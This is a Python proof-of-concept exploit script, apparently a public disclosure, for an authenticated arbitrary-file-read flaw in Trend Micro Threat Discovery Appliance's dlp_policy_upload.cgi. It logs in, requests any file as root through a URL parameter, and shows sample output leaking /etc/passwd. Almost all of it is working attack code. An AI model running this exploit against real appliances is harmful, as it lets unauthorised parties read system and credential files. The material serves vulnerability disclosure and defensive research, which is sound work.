#!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ File: TDA_InstallationCD.2.6.1062r1.en_US.iso sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 Summary: ======== There exists a post authenticated file disclosure vulnerability that can be used to leak files as root. Notes: ====== - Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... Example: ======== saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py (+) usage: ./poc.py <target> <pass> <file> (+) eg: ./poc.py admin /etc/passwd saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py admin123 /etc/passwd (+) logged in... (+) downloading file... root:x:0:0:root:/root:/bin/true tda:x:1:1:nobody:/:/bin/true monitor:x:1:1:nobody:/:/bin/true pcap:x:77:77:tcpdump:/var/log:/bin/true saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py admin123 /var/i_dont_exist (+) logged in... (+) downloading file... (-) file: /var/i_dont_exist doesnt exist! """ import re import sys import requests requests.packages.urllib3.disable_warnings() def remove_last_line_from_string(s): return s[:s.rfind('\r\n')] def download_file(): r = s.get("https://%s/cgi-bin/dlp_policy_upload.cgi?Q_UPLOAD_ID=1&Q_UPLOAD_TEMPLATE=%s" % (t, f), verify=False) data = r.text if len(data) > 52: fdata = str(data).split("\n") fdata.pop() fdata.pop() print '\n'.join(fdata) else: print "(-) file: %s doesnt exist!" % f if len(sys.argv) != 4: print "(+) usage: %s <target> <pass> <file>" % sys.argv[0] print "(+) eg: %s admin /etc/passwd" % sys.argv[0] sys.exit(-1) t = sys.argv[1] p = sys.argv[2] f = sys.argv[3] bu = "https://%s/" % t l_url = "%scgi-bin/logon.cgi" % bu s = requests.Session() r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) if "frame.cgi" in r.text: print "(+) logged in..." print "(+) downloading file..." download_file()